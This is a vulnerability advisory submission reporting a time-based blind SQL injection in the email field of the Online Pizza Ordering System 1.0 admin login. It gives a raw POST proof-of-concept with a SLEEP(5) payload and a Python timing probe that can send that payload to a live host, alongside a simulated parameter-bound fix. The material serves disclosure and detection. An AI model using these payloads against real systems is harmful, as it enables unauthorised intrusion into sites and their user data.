| Title | SOURCECODESTER ONLINE PIZZA ORDERING SYSTEM 1.0 login page SQL Injection |
|---|
| Description | A SQL injection vulnerability has been found in SourceCodester Online Pizza Ordering System 1.0. A remote, unauthenticated attacker can exploit it by sending a crafted request. The vulnerable URI is /php-opos/admin/ajax.php?action=login2, which is the login page. The parameter 'email' is injectable.
A working PoC is below:
POST /php-opos/admin/ajax.php?action=login2 HTTP/1.1
*************************************
email=abc%40qq.com' AND (SELECT 9110 FROM (SELECT(SLEEP(5)))XSlc) AND 'jFNl'='jFNl&password=def
This is a time-based blind injection; the server delays its response by about 5 seconds when the payload is sent. |
|---|
| Source | https://www.sourcecodester.com/php/16166/online-pizza-ordering-system-php-free-source-code.html |
|---|
| User | WWesleywww (UID 43117) |
|---|
| Submission | 03/17/2023 07:47 (3 years ago) |
|---|
| Moderation | 03/17/2023 07:58 (12 minutes later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 223300 [SourceCodester Online Pizza Ordering System 1.0 Login Page ajax.php?action=login2 email sql injection] |
|---|
| Points | 20 |
|---|
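To turn the PoC above into a repeatable timing check, here is an added example in Python. It is not code from the Online Pizza Ordering System or from the submitter: the `vulnerable_login` and `hardened_login` handlers are constructed stand-ins for what a string-concatenating and a parameter-binding version of the `login2` action would do with the `email` field, the MySQL server is simulated (`simulated_mysql_delay` only honours `SLEEP(n)` that lands outside a string literal), and the 0.12 s baseline latency is an assumed value. The `http_send` helper is the real transport for a lab host you provide and is not called here.

```python
"""Time-based blind SQL injection check modelled on the login2 PoC above.

Added example: handlers and server timing are constructed stand-ins, not the
project's code, so the check runs offline and instantly.
"""
import re
import statistics
import time
import urllib.request
from urllib.parse import parse_qs, urlencode

TARGET = "/php-opos/admin/ajax.php?action=login2"  # URI from the submission
SLEEP_SECONDS = 5                                  # delay used in the PoC
BASELINE_LATENCY = 0.12                            # assumed normal response time (constructed)


def build_login_body(email, password="def", sleep_seconds=None):
    """Form body for login2; with sleep_seconds set, wrap email in the PoC's payload."""
    if sleep_seconds is not None:
        email = (f"{email}' AND (SELECT 9110 FROM (SELECT(SLEEP({sleep_seconds})))XSlc)"
                 f" AND 'jFNl'='jFNl")
    return urlencode({"email": email, "password": password})


_SLEEP = re.compile(r"SLEEP\s*\(\s*(\d+)\s*\)", re.IGNORECASE)


def simulated_mysql_delay(sql):
    """Seconds a MySQL server would stall on this statement (simulation).

    Tracks single-quoted literals (with '' and \\' escapes) and counts SLEEP(n)
    only outside a literal: the difference between injected SQL and a string value.
    """
    unquoted, in_string, i = [], False, 0
    while i < len(sql):
        ch = sql[i]
        if in_string:
            if ch == "\\":                               # backslash escape
                i += 2
                continue
            if ch == "'" and sql[i + 1:i + 2] == "'":     # doubled quote in literal
                i += 2
                continue
            if ch == "'":
                in_string = False
        elif ch == "'":
            in_string = True
        else:
            unquoted.append(ch)
        i += 1
    return sum(int(m.group(1)) for m in _SLEEP.finditer("".join(unquoted)))


def vulnerable_login(body):
    """Stand-in handler that concatenates the form fields into SQL (constructed)."""
    form = parse_qs(body)
    email, password = form["email"][0], form["password"][0]
    sql = f"SELECT * FROM users WHERE email = '{email}' AND password = md5('{password}')"
    return BASELINE_LATENCY + simulated_mysql_delay(sql)


def hardened_login(body):
    """Same handler with values bound as parameters (modelled as driver-side quoting)."""
    form = parse_qs(body)

    def bind(value):
        return "'" + value.replace("\\", "\\\\").replace("'", "''") + "'"

    sql = (f"SELECT * FROM users WHERE email = {bind(form['email'][0])} "
           f"AND password = md5({bind(form['password'][0])})")
    return BASELINE_LATENCY + simulated_mysql_delay(sql)


def time_based_probe(send, email="abc@qq.com", sleep_seconds=SLEEP_SECONDS, samples=3):
    """Return (injectable, median_baseline_s, median_delayed_s).

    send(body) posts the body to TARGET and returns elapsed seconds. The median
    over several samples keeps one slow response from looking like a hit, and
    most of the requested delay must show up before the target counts as injectable.
    """
    baseline = statistics.median(send(build_login_body(email)) for _ in range(samples))
    delayed = statistics.median(
        send(build_login_body(email, sleep_seconds=sleep_seconds)) for _ in range(samples))
    return delayed - baseline >= 0.8 * sleep_seconds, baseline, delayed


def http_send(body, base_url="http://127.0.0.1"):
    """Real transport for a lab host you are authorised to test (not called here)."""
    req = urllib.request.Request(
        base_url + TARGET, data=body.encode(),
        headers={"Content-Type": "application/x-www-form-urlencoded"})
    start = time.perf_counter()
    urllib.request.urlopen(req, timeout=SLEEP_SECONDS * 3).read()
    return time.perf_counter() - start


if __name__ == "__main__":
    for name, handler in (("vulnerable", vulnerable_login), ("hardened", hardened_login)):
        hit, base, slow = time_based_probe(handler)
        print(f"{name:10s} baseline={base:.2f}s payload={slow:.2f}s injectable={hit}")
```

Against the constructed handlers the vulnerable one reports a 5 s gap and the hardened one none, because the bound value keeps `SLEEP(5)` inside the string literal. Against a real host, swap `handler` for `http_send` and expect jitter: the median and the 80 % threshold are there so that a single slow response does not produce a false positive, and running the baseline first gives you the comparison point the PoC's "responds in 5 s" claim implicitly relies on.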